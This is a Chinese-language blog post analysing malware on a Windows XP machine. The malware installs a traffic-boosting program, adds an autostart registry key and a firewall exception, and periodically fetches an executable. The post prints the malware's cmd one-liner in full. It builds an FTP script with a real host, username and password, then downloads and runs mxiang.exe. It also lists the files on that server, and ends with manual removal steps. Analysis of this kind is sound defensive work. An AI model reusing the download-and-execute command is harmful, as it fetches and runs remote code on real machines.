发现一个利用流量精灵的恶意软件

一朋友的电脑出了问题，通过远程协助检查，发现是被恶意软件入侵了。该软件在系统中安装了流量精灵，然后通过每隔一段时间从一个 ftp 服务器上下载一个可执行程序来检查和确保流量精灵在运行。目前只是抑制了该恶意软件的行为，但是感染方式和根治方法还没找到。

朋友的电脑是 Windows XP sp3 系统，平常也就看看股票、处理办公文档和浏览新闻网页。大概是四五天前感染上这个恶意软件的。虽然系统里安装了 Symantec Endpoint Protection，可是对这个软件没有反应，我猜想是因为这个软件的行为看起来像是用户自己进行的操作。

目录 Contents

1. 该恶意软件组成
2. 感染后的症状
3. 解决办法

1. 该恶意软件组成¶

这个恶意软件会在用户的资料文件夹（即 %APPDATA%，例如 C:\Documents and Settings\Administrator\Application Data\ 目录下）中安装流量精灵，目的估计是增加其个人抢注的大量域名的流量以买个好价钱。流量精灵是一款针对网站站长、个人博客、网络写手、网站推广、网络营销、网店推广等各类网络从业人员，用于提高网站流量，店铺/商品浏览量，网页PV(访问量)，UV(独立访客)，IP(独立IP)等的免费网络推广软件。

它会将这个流量精灵软件的主进程 jlguaji.exe 设置为开机自启动项。即在注册表中添加下面的项：

[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'urlspace' = '%APPDATA%\jlguaji.exe -h'

还会添加修改 Windows 防火墙规则以允许该软件访问网络。类似于（下面只是其中一条）：

[<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '%TEMP%\jlguaji.exe' = '%TEMP%\jlguaji.exe:*:Enabled:精灵软件'

另外，在 system32 文件夹（一般是 C:\Windows\system32）下还有一个 mxiang.exe 文件。该文件是会每隔一段时间就出来一次的。

因为不知道这个病毒是怎么感染上的，也没有病毒文件，不知道还有其他的什么东西被安装在系统中（肯定还有）。

2. 感染后的症状¶

该病毒（恶意软件）会在系统启动时自动运行，开启流量精灵来挂机。会占用大量的 CPU 和内存资源。

然后每隔一段时间 —— 有时候十三四分钟，有时候二十多分钟 —— 就会通过某个方法来触发 svchost.exe （在 C:\WINDOWS\System32\ 下）进程以调用 C:\WINDOWS\System32\Wbem 目录下的 wmiprvse.exe 进程来启用 ftp。

它会先创建一个记录文件 Ex1.dat 然后通过 ftp 来执行该文件中的内容从 ftp 上下载 mxiang.exe 并执行它：

cmd /c @echo open zuyong.3322.org>>Ex1.dat&@echo myftp>>Ex1.dat&@echo 123654>>Ex1.dat&@echo bin>>Ex1.dat&@echo get mxiang.exe>>Ex1.dat&@echo bye>>Ex1.dat&@ftp -s:Ex1.dat&del Ex1.dat&mxiang.exe&mxiang.exe

写的好看些就是：

cmd /c
@echo open zuyong.3322.org>>Ex1.dat
@echo myftp>>Ex1.dat
@echo 123654>>Ex1.dat
@echo bin>>Ex1.dat
@echo get mxiang.exe>>Ex1.dat
@echo bye>>Ex1.dat
@ftp -s:Ex1.dat
del Ex1.dat
mxiang.exe
mxiang.exe

可以看到该 ftp 服务器是用的动态域名 zuyong.3322.org，访问的 IP 是 203.171.230.41（查询到的信息是该 IP 属于河南省郑州市景安计算机网络技术有限公司）。使用上面的信息登录 ftp 可以看到还有几个类似文件，估计都是用来搞小动作的：

Index of /
Name	Size	Date Modified
ctffmon.exe	317 kB	8/23/12 3:42:00 PM
hfs.exe	598 kB	7/27/12 10:45:00 AM
msiexeca.exe	621 kB	7/10/12 2:28:00 PM
mxiang.exe	317 kB	8/23/12 3:42:00 PM
mysql.exe	317 kB	8/23/12 3:42:00 PM
sougou.exe	317 kB	8/23/12 3:42:00 PM
svhost.exe	317 kB	8/23/12 3:43:00 PM

mxiang.exe 运行的时候会出错，信息如下：

mxiang.exe - 应用程序错误
"0x004012ed" 指令引用的 "0x0000000c" 内存。该内存不能为 "read"。
要终止程序，请单击“确定”。
要调试程序，请单击“取消”。

如果没有上面的错误提示，估计这朋友也不会觉得有问题而找我。

3. 解决办法¶

解决办法请参考文后评论：用冰刃或者Xuetr直接删掉。我未做测试，无法提供更详细的信息。

感谢 FROYO 童鞋提供方法。

目前还没找到彻底的解决办法，因为不知道该病毒是通过什么方法来启动上面介绍的 ftp 远程下载文件过程的。所以我只能：

使用记事本编辑 \windows\system32\mxiang.exe 文件，将其内容清空后保存，然后编辑该文件的属性 ——> 安全，将其权限针对所有用户和用户组都设置为“禁止”；
清理 jlguaji.exe 的开机自启动项；
将 %APPDATA% 目录下的流量精灵文件夹（忘记文件夹名称了）内的东西全部删除，然后编辑该文件夹的属性 ——> 安全，将其权限针对所有用户和用户组都设置为“禁止”。

找到彻底的解决方案之后我会再更新此文。同时希望有经验的朋友提供解决方法。©

本文发表于水景一页。永久链接：<https://cnzhx.net/blog/a-malicious-soft-mxiang/>。转载请保留此信息及相应链接。